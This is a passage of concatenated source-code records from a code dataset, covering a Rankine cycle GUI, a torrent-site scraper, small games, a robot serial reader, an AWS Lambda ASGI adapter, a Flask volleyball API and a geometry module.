self.le_H2.setText('{:0.2f}'.format(self.Controller.state2.h))\n self.le_H3.setText('{:0.2f}'.format(self.Controller.state3.h))\n self.le_H4.setText('{:0.2f}'.format(self.Controller.state4.h))\n\n # fill out the other properties for the rankine cycle\n self.le_Efficiency.setText('{:0.2f}'.format(self.Controller.efficiency))\n self.le_TurbineWork.setText('{:0.2f}'.format(self.Controller.turbine_work))\n self.le_PumpWork.setText('{:0.2f}'.format(self.Controller.pump_work))\n self.le_HeatAdded.setText('{:0.2f}'.format(self.Controller.heat_added))\n\n self.doPlot()\n self.cmb_Abcissa.setEnabled(True)\n self.cmb_Ordinate.setEnabled(True)\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='s', Y='T', ax=self.ax)\n # self.canvas.draw()\n\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='h', Y='T', ax=self.ax)\n # self.canvas.draw()\n\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='s', Y='h', ax=self.ax)\n # self.canvas.draw()\n\n\n# if this module is being imported, this won't run. 
If it is the main module, it will run.\nif __name__ == '__main__':\n app = qtw.QApplication(sys.argv)\n mw = MainWindow()\n mw.setWindowTitle('Rankine Cycle Calculator')\n sys.exit(app.exec())\n","sub_path":"Exam3/Problem2/Rankine_app.py","file_name":"Rankine_app.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"493868366","text":"# coding=utf-8\n# Fetch the specified resources from the home page and display them in the format: date, type, resource name, resource detail page\n\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport re, time\n\npage_count = 80 # items per page\npage_num = 1 # page number\ntoday = time.strftime(\"%Y/%m/%d\", time.localtime()) # today's date\nbase_url = 'https://share.dmhy.org'\nbangumi_name = '枫叶.*?太阳|驚爆危機|gun' # resource names to search for, separated by |\n\nurl = base_url + '/topics/list/page/'+str(page_num)\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\npage = request.Request(url, headers=headers)\npage_info = request.urlopen(page).read() # open the URL, get the HttpResponse object and read its response body\n\n# convert the fetched content to BeautifulSoup format, using html.parser as the parser\nsoup = BeautifulSoup(page_info, 'html.parser', from_encoding='utf-8')\n# pretty-print the html\n# print(soup.prettify())\n\n\ncount = 0 # counter\n\ntbody = soup.find('table','tablesorter').tbody\ntr = tbody.find_all('tr')\nfor per_tr in tr:\n name = per_tr.find_all('td')\n today_flag = name[0].span.find(text=re.compile(today))\n name_flag = name[2].find(text=re.compile(bangumi_name,re.I))\n if today_flag and name_flag and name[1].find('a').get('class')[0] == 'sort-2':\n type = name[1].find('a').get_text().strip()\n cnt = name[2].find_all('a')\n if len(cnt) == 1:\n cnt_detail = cnt[0].get_text().strip() + ' ' + base_url + cnt[0].get('href')\n else:\n cnt_detail = cnt[0].get_text().strip() + ' ' + cnt[1].get_text().strip() + ' ' + base_url + cnt[1].get('href')\n\n # output format: date size type resource-name link\n print(name[0].span.string, name[4].get_text(), type, cnt_detail)\n count += 1\n\nprint('共{:d}项'.format(count))\n\n\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644727205","text":"import random\n\nprint('Добро пожаловать в числовую угадайку')\n\n\ndef max_range():\n while True:\n n = input('Назовите диапозон от 1 до какого числа хотите угадать: ')\n if not n.isdigit() or int(n) < 1:\n print('Введите число от 1')\n continue\n return int(n)\n\n\nq = max_range()\nnum = random.randrange(1, q)\n\n\ndef get_num():\n while True:\n s = input(f'Угадайте число от 1 до {q}: ')\n if not s.isdigit() or int(s) < 1 or int(s) > q:\n print(f'Может введете все таки число от 1 до {q}?')\n continue\n return int(s)\n\n\ndef game():\n x, counter = 0, 1\n while x != num:\n x = get_num()\n if x < num:\n print('Ваше число меньше загаданного, попробуйте еще разок')\n counter += 1\n continue\n elif x > num:\n print('Ваше число больше загаданного, попробуйте еще разок')\n counter += 1\n continue\n print('Вы угадали, поздравляем!')\n print('Количество попыток', counter)\n\n\nwhile True:\n game()\n print('Отлична игра еще разок?')\n answer = input(\"'Да' или 'Y' если хотите продолжить: \")\n if answer.lower() in ('да', 'y'):\n q = max_range()\n num = random.randrange(1, q)\n continue\n else:\n break\n\nprint('Спасибо, что играли в числовую угадайку. 
Еще увидимся...')\n","sub_path":"1.answer_num.py","file_name":"1.answer_num.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"313285751","text":"from crc8 import crc8\nfrom injector import inject\nfrom socketio.client import Client\nfrom src.domain.robot.RobotInfos import RobotInfos\nfrom src.domain.robot.SerialPort import SerialPort\nfrom src.domain.robot.data_classes.Resistor import ResistorInfo\nfrom src.domain.robot.data_classes.RobotBattery import RobotBattery\nfrom src.domain.robot.data_classes.RobotPowers import RobotPowers\n\n\nclass STMReader(object):\n\n @inject\n def __init__(self, socket: Client, robot_infos: RobotInfos, serial_port: SerialPort):\n self.__socket = socket\n self.__robot_infos = robot_infos\n self.__serial_port = serial_port\n self.read_thread = self.__socket.start_background_task(self.read_handler)\n\n def validate_checksum(self, message: str, checksum: str) -> bool:\n return self.generate_checksum(message) == checksum\n\n @staticmethod\n def generate_checksum(message: str) -> str:\n crc8_hash = crc8()\n crc8_hash.update(message.encode(\"utf8\"))\n return crc8_hash.hexdigest()\n\n def read_valid_line(self) -> str:\n received_valid_line = False\n while not received_valid_line:\n received_line = self.__serial_port.read_line()\n message, checksum = received_line.split(\";\")\n received_valid_line = self.validate_checksum(message, checksum)\n if not received_valid_line:\n print(\"Invalid checksum\")\n else:\n return message\n\n def read_handler(self):\n while True:\n received_line = self.read_valid_line()\n if \"POWER\" in received_line:\n received_line = received_line.replace(\"POWER:\", \"\")\n powers = received_line.split(\",\")\n self.__robot_infos.powers = RobotPowers(*powers)\n elif \"GRIPPER_PROXIMITY\" in received_line:\n received_line = received_line.replace(\"GRIPPER_PROXIMITY:\", \"\")\n gripper_making_contact = bool(received_line)\n current_gripper_info = self.__robot_infos.gripper_info\n current_gripper_info.making_contact = gripper_making_contact\n self.__robot_infos.gripper_info = current_gripper_info\n elif \"RESISTOR\" in received_line:\n received_line = received_line.replace(\"RESISTOR:\", \"\")\n resistor = int(received_line)\n self.__robot_infos.resistor_info = ResistorInfo(resistor)\n elif \"BATTERY\" in received_line:\n received_line = received_line.replace(\"BATTERY:\", \"\")\n battery_charge = int(received_line)\n self.__robot_infos.battery = RobotBattery(battery_charge)\n else:\n print(\"received from STM: {}\".format(received_line))\n","sub_path":"robot/src/domain/stm/STMReader.py","file_name":"STMReader.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561866291","text":"import base64\nimport asyncio\nimport urllib.parse\nimport json\nimport typing\nfrom dataclasses import dataclass\n\nfrom mangum.lifespan import Lifespan\nfrom mangum.utils import get_logger, make_response\nfrom mangum.types import ASGIApp\nfrom mangum.protocols.http import ASGIHTTPCycle\nfrom mangum.protocols.websockets import ASGIWebSocketCycle\nfrom mangum.exceptions import ASGIWebSocketCycleException\nfrom mangum.connections import ConnectionTable, __ERR__\n\n\nDEFAULT_TEXT_MIME_TYPES = [\n \"application/json\",\n \"application/javascript\",\n \"application/xml\",\n \"application/vnd.api+json\",\n]\n\n\ndef get_server_and_client(\n event: dict, is_http_api: bool = False\n) 
-> typing.Tuple: # pragma: no cover\n \"\"\"\n Parse the server and client for the scope definition, if possible.\n \"\"\"\n\n if is_http_api:\n client_addr = event[\"requestContext\"][\"http\"][\"sourceIp\"]\n else:\n client_addr = event[\"requestContext\"].get(\"identity\", {}).get(\"sourceIp\", None)\n\n client = (client_addr, 0)\n\n headers = event.get(\"headers\") or {}\n server_addr = headers.get(\"host\") if is_http_api else headers.get(\"Host\")\n\n if server_addr is not None:\n if \":\" not in server_addr:\n server_port = 80\n else:\n server_addr, server_port = server_addr.split(\":\")\n server_port = int(server_port)\n\n server = (server_addr, server_port) # type: typing.Any\n else:\n server = None\n\n return server, client\n\n\n@dataclass\nclass Mangum:\n\n app: ASGIApp\n enable_lifespan: bool = True\n api_gateway_base_path: typing.Optional[str] = None\n text_mime_types: typing.Optional[typing.List[str]] = None\n log_level: str = \"info\"\n\n def __post_init__(self) -> None:\n self.logger = get_logger(log_level=self.log_level)\n if self.enable_lifespan:\n loop = asyncio.get_event_loop()\n self.lifespan = Lifespan(self.app, logger=self.logger)\n loop.create_task(self.lifespan.run())\n loop.run_until_complete(self.lifespan.wait_startup())\n\n def __call__(self, event: dict, context: dict) -> dict:\n try:\n response = self.handler(event, context)\n except BaseException as exc:\n raise exc\n return response\n\n def strip_base_path(self, path: str) -> str:\n if self.api_gateway_base_path:\n script_name = \"/\" + self.api_gateway_base_path\n if path.startswith(script_name):\n path = path[len(script_name) :]\n return urllib.parse.unquote(path or \"/\")\n\n def handler(self, event: dict, context: dict) -> dict:\n\n if \"eventType\" not in event[\"requestContext\"]:\n response = self.handle_http(event, context)\n else:\n\n response = self.handle_ws(event, context)\n\n if self.enable_lifespan:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.lifespan.wait_shutdown())\n return response\n\n def handle_http(self, event: dict, context: dict) -> dict:\n is_http_api = \"http\" in event[\"requestContext\"]\n server, client = get_server_and_client(event, is_http_api)\n headers = event.get(\"headers\") or {}\n headers_key_value_pairs = [\n [k.lower().encode(), v.encode()] for k, v in headers.items()\n ]\n\n if is_http_api:\n query_string = event.get(\"rawQueryString\")\n else:\n multi_value_query_string_params = event[\"multiValueQueryStringParameters\"]\n query_string = (\n urllib.parse.urlencode(\n multi_value_query_string_params, doseq=True\n ).encode()\n if multi_value_query_string_params\n else b\"\"\n )\n\n event_path = (\n event[\"requestContext\"][\"http\"][\"path\"] if is_http_api else event[\"path\"]\n )\n http_method = (\n event[\"requestContext\"][\"http\"][\"method\"]\n if is_http_api\n else event[\"httpMethod\"]\n )\n\n scope = {\n \"type\": \"http\",\n \"http_version\": \"1.1\",\n \"method\": http_method,\n \"headers\": headers_key_value_pairs,\n \"path\": self.strip_base_path(event_path),\n \"raw_path\": None,\n \"root_path\": \"\",\n \"scheme\": headers.get(\"X-Forwarded-Proto\", \"https\"),\n \"query_string\": query_string,\n \"server\": server,\n \"client\": client,\n \"asgi\": {\"version\": \"3.0\"},\n \"aws.event\": event,\n \"aws.context\": context,\n }\n\n is_binary = event.get(\"isBase64Encoded\", False)\n body = event.get(\"body\") or b\"\"\n if is_binary:\n body = base64.b64decode(body)\n elif not isinstance(body, bytes):\n body = body.encode()\n\n if 
self.text_mime_types:\n text_mime_types = self.text_mime_types + DEFAULT_TEXT_MIME_TYPES\n else:\n text_mime_types = DEFAULT_TEXT_MIME_TYPES\n\n asgi_cycle = ASGIHTTPCycle(\n scope, text_mime_types=text_mime_types, logger=self.logger\n )\n asgi_cycle.put_message(\n {\"type\": \"http.request\", \"body\": body, \"more_body\": False}\n )\n response = asgi_cycle(self.app)\n return response\n\n def handle_ws(self, event: dict, context: dict) -> dict:\n if __ERR__: # pragma: no cover\n raise ImportError(__ERR__)\n\n request_context = event[\"requestContext\"]\n connection_id = request_context.get(\"connectionId\")\n domain_name = request_context.get(\"domainName\")\n stage = request_context.get(\"stage\")\n event_type = request_context[\"eventType\"]\n endpoint_url = f\"https://{domain_name}/{stage}\"\n\n if event_type == \"CONNECT\":\n # The initial connect event. Parse and store the scope for the connection\n # in DynamoDB to be retrieved in subsequent message events for this request.\n server, client = get_server_and_client(event)\n\n # The scope headers must be JSON serializable to store in DynamoDB, but\n # they will be parsed on the MESSAGE event.\n headers = event.get(\"headers\") or {}\n\n root_path = event[\"requestContext\"][\"stage\"]\n scope = {\n \"type\": \"websocket\",\n \"path\": \"/\",\n \"headers\": headers,\n \"raw_path\": None,\n \"root_path\": root_path,\n \"scheme\": headers.get(\"X-Forwarded-Proto\", \"wss\"),\n \"query_string\": \"\",\n \"server\": server,\n \"client\": client,\n \"aws\": {\"event\": event, \"context\": context},\n }\n connection_table = ConnectionTable()\n status_code = connection_table.update_item(\n connection_id, scope=json.dumps(scope)\n )\n\n if status_code != 200: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n return make_response(\"OK\", status_code=200)\n\n elif event_type == \"MESSAGE\":\n\n connection_table = ConnectionTable()\n item = connection_table.get_item(connection_id)\n if not item: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n\n # Retrieve and deserialize the scope entry created in the connect event for\n # the current connection.\n scope = json.loads(item[\"scope\"])\n\n # Ensure the scope definition complies with the ASGI spec.\n query_string = scope[\"query_string\"]\n headers = scope[\"headers\"]\n headers = [\n [k.encode(), v.encode()] for k, v in headers.items() # type: ignore\n ]\n query_string = query_string.encode() # type: ignore\n scope.update({\"headers\": headers, \"query_string\": query_string})\n\n asgi_cycle = ASGIWebSocketCycle(\n scope,\n endpoint_url=endpoint_url,\n connection_id=connection_id,\n connection_table=connection_table,\n )\n asgi_cycle.app_queue.put_nowait({\"type\": \"websocket.connect\"})\n asgi_cycle.app_queue.put_nowait(\n {\n \"type\": \"websocket.receive\",\n \"path\": \"/\",\n \"bytes\": None,\n \"text\": event[\"body\"],\n }\n )\n\n try:\n asgi_cycle(self.app)\n except ASGIWebSocketCycleException: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n return make_response(\"OK\", status_code=200)\n\n elif event_type == \"DISCONNECT\":\n connection_table = ConnectionTable()\n status_code = connection_table.delete_item(connection_id)\n if status_code != 200: # pragma: no cover\n return make_response(\"WebSocket disconnect error.\", status_code=500)\n return make_response(\"OK\", status_code=200)\n return make_response(\"Error\", status_code=500) # pragma: no 
cover\n","sub_path":"mangum/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"599684224","text":"\"\"\"\nAuthor: Alan Danque\nDate: 20210323\nPurpose:Creates map of the top employers\n\nReferences:\nhttps://moneyinc.com/the-20-biggest-employers-in-nyc/\nhttps://fortune.com/best-workplaces-new-york/2020/search/\n\n\"\"\"\nimport csv\nimport folium\nimport pandas as pd\nimport json\nfrom folium import plugins\n#import imgkit\nimport pygeohash\n\nNYCEmployers = \"C:/Alan/DSC680/Project1Data/NYCEmployers.csv\"\nRentHop = \"C:/Alan/DSC680/Project1Data/renthopNYC.csv\"\nRentHop_OUT = \"C:/Alan/DSC680/Project1Data/renthopNYC_OUT.csv\"\nYelp = \"C:/Alan/DSC680/Project1Data/yelp_business_data.csv\"\n\n\n# TOP EMPLOYERS\nnycemployers_df = pd.read_csv(NYCEmployers,encoding='utf-8', names=[\"Rank\",\"Name\",\"Industry\",\"HQ Location\",\"Sites\",\"Employees\",\"World Wide Revenue\",\"Latitude\",\"Longitude\"],sep=',',header=0,quoting=csv.QUOTE_ALL, engine='python')\nnycemployers_df['geohash'] = nycemployers_df.apply(lambda x: pygeohash.encode(x.Latitude, x.Longitude), axis=1)\n\n# RENTHOP\nrenthop_df = pd.read_csv(RentHop)\nrenthop_df['geohash'] = renthop_df.apply(lambda x: pygeohash.encode(x.latitude, x.longitude), axis=1)\n\nfor index, row in nycemployers_df.iterrows():\n fieldname = row['Name']+\" Distance\"\n emp_geohash = row['geohash']\n renthop_df[fieldname] = renthop_df.apply(lambda x: pygeohash.geohash_approximate_distance(x.geohash, emp_geohash) / 1000, axis=1)\n\n # distm_west = pygeohash.geohash_approximate_distance(srcgeoval, westval) / 1000\n\nprint(type(renthop_df))\nprint(renthop_df.shape) # 49,352 obs and 15 vars\nprint(renthop_df.columns)\n\nrenthop_df.to_csv(RentHop_OUT)\n","sub_path":"Scripts/CalculateDistancesToTopNYCEmployers.py","file_name":"CalculateDistancesToTopNYCEmployers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"172771198","text":"import pygame\r\nfrom pygame.locals import *\r\nfrom Map import *\r\nimport random\r\nimport time\r\n\r\nBLACK = (0,0,0)\r\nRED = (255,0,0)\r\nBLUE = (0,0,255)\r\nYELLOW = (255,255,0)\r\nGRAY = (128,128,128)\r\n\r\n# Load the pictures representing enemies of different colors.\r\nred_monster = pygame.image.load(\"red_monster.jpg\")\r\nblue_monster = pygame.image.load(\"blue_monster.jpg\")\r\nblack_monster = pygame.image.load(\"black_monster.jpg\")\r\nyellow_monster = pygame.image.load(\"yellow_monster.jpg\")\r\ngray_monster = pygame.image.load(\"gray_monster.jpg\")\r\n\r\nclass Enemy(pygame.sprite.Sprite): # Define a class Enemy.\r\n def __init__(self, health, speed, price, color, resistant, points):\r\n super().__init__()\r\n self.color = color\r\n # Define the picture of an enemy.\r\n if (self.color == \"B\"):\r\n self.image = black_monster\r\n elif (self.color == \"r\"):\r\n self.image = red_monster\r\n elif (self.color == \"b\"):\r\n self.image = blue_monster\r\n elif (self.color == \"y\"):\r\n self.image = yellow_monster\r\n elif (self.color == \"g\"):\r\n self.image = gray_monster\r\n try:\r\n self.rect = self.image.get_rect()\r\n except AttributeError:\r\n print(\"Invalid enemy color!\")\r\n import Main\r\n Main.main()\r\n self.health = health # The health of the enemy.\r\n self.value = 0 # A variable \"value\" that tells how long distance the enemy has travelled in the field.\r\n self.points = points # 
A dictionary that contains the points in which the direction of the enemies should change and the directions to which the movement will change.\r\n self.direction = \"none\" # Initialize a variable that tells the direction of movement of the enemy.\r\n self.speed = speed # The speed of the enemy.\r\n self.n = 0 # A counter that ensures that an enemy chooses its direction only in an intersection and after it, the direction is kept constant.\r\n self.decideDirection = 0 # A variable that gets either value 0 or 1. This decides the direction of the enemy after an intersection.\r\n self.poisonTime = 0 # A counter that controls how quickly poison affects the enemy.\r\n self.poison = 0 # A variable that tells whether an enemy is poisoned or not.\r\n self.price = price # The amount of money the player gets when he destroys this enemy.\r\n self.resistant = resistant # To which type of tower the enemy is immune.\r\n self.dist = 0 # The distance of an enemy from a smart bomb.\r\n \r\n \r\n def get_location(self): # Returns the coordinates of an enemy.\r\n x = self.rect.centerx\r\n y = self.rect.centery\r\n coordinates = (x, y)\r\n return coordinates\r\n \r\n def update(self): # This controls how the properties of an enemy (for example, location) are varied within one iteration of the game loop.\r\n if self.poison == 1 and float(time.monotonic()) - float(self.poisonTime) > 3.0: # If the enemy is poisoned and over 3 seconds have passed since the poison last affected the enemy, we reduce the health of the enemy by 5.\r\n self.poisonTime = time.monotonic()\r\n self.health -= 5\r\n \r\n if self.get_location() in self.points: # If the coordinates of an enemy are the same as the coordinates of some intersection, we use these coordinates as a key to dictionary \"self.points\" and read the values corresponding to this key.\r\n self.n = 0\r\n self.direction = self.points[self.get_location()]\r\n \r\n if self.direction == \"right\": # If the dictionary returns a value \"right\", we move the enemy to the right with speed \"self.speed\" pixels / screen update.\r\n self.rect.centerx += self.speed\r\n \r\n elif self.direction == \"left\":\r\n self.rect.centerx -= self.speed\r\n \r\n elif self.direction == \"up\":\r\n self.rect.centery -= self.speed\r\n \r\n elif self.direction == \"down\":\r\n self.rect.centery += self.speed\r\n \r\n elif self.direction == \"A\": # If the dictionary returns a value \"A\", we randomly choose an integer from the range [0,1] and, depending on the result, move the enemy either up or right.\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n \r\n elif self.direction == \"B\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n \r\n elif self.direction == \"C\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n elif self.direction == \"D\":\r\n if self.n == 0:\r\n self.decideDirection = 
random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n \r\n elif self.direction == \"E\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n elif self.direction == \"F\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n self.value += self.speed\r\n","sub_path":"Enemysprite.py","file_name":"Enemysprite.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"480316829","text":"import random\nimport time\n\nclass Game():\n def __init__(self):\n under_board = [1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]\n random.shuffle(under_board)\n\n self.under_board = [\n under_board[:4],\n under_board[4:8],\n under_board[8:12],\n under_board[12:]\n ]\n\n self.board = [list('*' * 4) for i in range(4)]\n\n self.first_card = None\n\n self.start_time = time.time()\n\n\n def show_board(self, *tiles):\n \"\"\"\n Creating the board for the game\n \"\"\"\n\n for row in range(len(self.board)):\n for column in range(len(self.board[0])):\n if (row, column) in tiles:\n print(self.under_board[row][column], end=\"\")\n else:\n print(self.board[row][column], end=\"\")\n print()\n\n def safe_input(self, prompt) -> (int, int):\n \"\"\"\n Lets the user input numbers, provided that the input is valid.\n \"\"\"\n try:\n user_input = [int(x) for x in input(prompt)]\n # assert that the input is valid\n assert len(user_input) == 2\n for u in user_input:\n assert u in range(4)\n assert (self.move_first_card is None) or (user_input != self.move_first_card)\n return user_input\n except (ValueError, AssertionError):\n print(u'\\u001b[31mThat is not a valid input! Please try again\\u001b[0m' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n return self.safe_input(prompt)\n\n def time_countdown(self):\n # time\n elapsed_time = time.time() - self.start_time\n global countdown\n countdown = 180 - int(elapsed_time)\n\n if countdown < 0:\n timeout = input('Oh no! Your time is up! Do you want to try again? [Y/N]' + '')\n if timeout[0] == 'Y':\n play_game()\n else:\n exit()\n\n def num_pick(self):\n \"\"\"\n Let the user choose two cards, assert whether they matched, and check if the game is finished.\n \"\"\"\n self.move_first_card = None\n a, b = self.safe_input('Pick two coordinates between 0 and 3 written like this \"21\" to pick a card on the board:' + '')\n self.move_first_card = [a, b]\n self.show_board((a, b))\n\n c, d = self.safe_input('Type two different coordinates between 0 and 3 to pick another card:' + '')\n self.show_board((a, b), (c, d))\n\n if a == c and b == d:\n print(u'\\u001b[31mTyping the same value twice is not a valid input! 
Please try again.\\u001b[0m' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n\n else:\n if self.under_board[a][b] == self.under_board[c][d]:\n self.time_countdown()\n print( '\\n'+ u'\\u001b[7m RESULT \\u001b[0m' + '\\n' + u'\\u001b[32mYour cards matched!\\u001b[0m' + '\\n' + 'You have' + ' ' + str(countdown) + ' ' + 'seconds left of the game. Hurry up!' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n self.board[a][b] = self.under_board[a][b]\n self.board[c][d] = self.under_board[c][d]\n else:\n self.time_countdown()\n print( '\\n'+ u'\\u001b[7m RESULT \\u001b[0m' + '\\n' + u'\\u001b[31mYour cards did not match!\\u001b[0m' + '\\n' + 'You have' + ' ' + str(countdown) + ' ' + 'seconds left of the game. Hurry up!' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n\n\n return any('*' in row for row in self.board)\n\n def play(self):\n \"\"\"\n Entrypoint to a game of Memory.\n \"\"\"\n\n self.show_board()\n\n while self.num_pick():\n pass\n print('Done!')\n\ndef play_game():\n game = Game()\n game.play()\n\n another_game = input('Do you want to play another game? [Y/N]')\n if another_game[0] == 'Y':\n play_game()\n else:\n exit()\n\n\nif __name__ == '__main__':\n play_game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"494543783","text":"import code\n\nclass Pokemon:\n \"\"\"Pokemon class\"\"\"\n\n def __init__(self, name, nickname=\"\", hp=100, level=1, speech=\"\"):\n \n self.name = name\n if nickname != \"\":\n self.nickname = nickname\n else:\n self.nickname = self.name.upper()\n self.hp = hp\n self.level = level\n if speech != \"\":\n self.speech = speech\n else:\n self.speech = f\"{self.name}!\"\n\n \"\"\"Implement later\n self.type = \"\"\n self.shiny = False\n self.weight = 0\n self.moveset = []\n self.nature = \"\"\n\n \"\"\"\n\n def speak(self):\n print(f\"{self.nickname} says {self.speech}\")\n\n\nlillian = Pokemon(\"mew\", \"Lillian\", 300, 5, \"mew\")\nmikey = Pokemon(\"shuckle\", \"Mikey Graham\", 500, 4, \"shuckleshuckle\")\nallan = Pokemon(\"empoleon\", \"Allan\", speech=\"penguin\")\nditto = Pokemon(\"ditto\", level=100, hp=10000)\n\ncode.interact(local=locals())","sub_path":"day20/pokemon2.py","file_name":"pokemon2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627752481","text":"from uuid import uuid4\n\nfrom flask import Blueprint, request, jsonify\n\nfrom auth import AuthService\nfrom shared.result import Result\nfrom volleyball_federation import VolleyballFederationService\nfrom webapi.helper import present_result, atomic\n\napi_bp = Blueprint(\"volleyball\", __name__, url_prefix=\"/api\")\n\n\"\"\"\nI used verbs in the URL endpoints because it is more compatible with the concept of DDD\nand is cleaner than using the resource name alone.\n\"\"\"\n\n\n@api_bp.route(\"/auth/signup\", methods=[\"POST\"])\n@atomic\ndef register_user():\n user_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"user_id\": user_id\n }\n\n auth = AuthService(getattr(request, 'uow', None))\n result = auth.signup_user(request_dto)\n\n if result.is_success:\n result = Result.ok({\"user_id\": user_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/auth/login\", methods=[\"POST\"])\n@atomic\ndef login_user():\n request_dto = {\n **request.get_json()\n }\n\n auth = AuthService(getattr(request, 'uow', None))\n result = auth.login_user(request_dto)\n\n if result.is_success:\n result = 
Result.ok({\"token\": result.value})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/team/create_team\", methods=[\"POST\"])\n@atomic\ndef create_team():\n team_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"team_id\": team_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.new_team(request_dto)\n\n if result.is_success:\n result = Result.ok({\"team_id\": team_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/stadium/build_stadium\", methods=[\"POST\"])\n@atomic\ndef build_stadium():\n stadium_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"stadium_id\": stadium_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.build_stadium(request_dto)\n\n if result.is_success:\n result = Result.ok({\"stadium_id\": stadium_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/match/new_match\", methods=[\"POST\"])\n@atomic\ndef new_match():\n match_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"match_id\": match_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.new_match(request_dto)\n\n if result.is_success:\n result = Result.ok({\"match_id\": match_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/match/define_match_seats\", methods=[\"PUT\"])\n@atomic\ndef define_seats_for_match():\n request_dto = {\n **request.get_json()\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.define_seats_for_match(request_dto)\n\n return present_result(result)\n","sub_path":"webapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"156113296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nObjects for dealing with geometric areas computations\n\nThis module provides many objects to deal with geometric areas computations.\nGeneral information on the use of each object is found in its help.\n\nConstants\n-----------\n- pi\n\nFunctions\n-----------\n- 'rectangle' - Return area of the rectangle with specified dimensions\n- 'square' - Return area of the square with specified dimensions\n- 'triangle' - Return area of the triangle with specified dimensions\n- 'parallelograms' - Return area of the parallelograms with specified dimensions\n- 'rhomboedre' - Return area of the rhomboedre with specified dimensions\n- 'trapeze' - Return area of the trapeze with specified dimensions\n- 'circle' - Return area of the circle with specified dimensions\n- 'circleSector' - Return area of the trapeze with specified dimensions\n\"\"\"\n\n################################################################################\n################################################################################\n#\n# IMPORTS\n#\n################################################################################\n################################################################################\nfrom math import pi\n\n################################################################################\n################################################################################\n#\n# VERSIONNING\n#\n################################################################################\n################################################################################\n__author__ = \"Valentin 
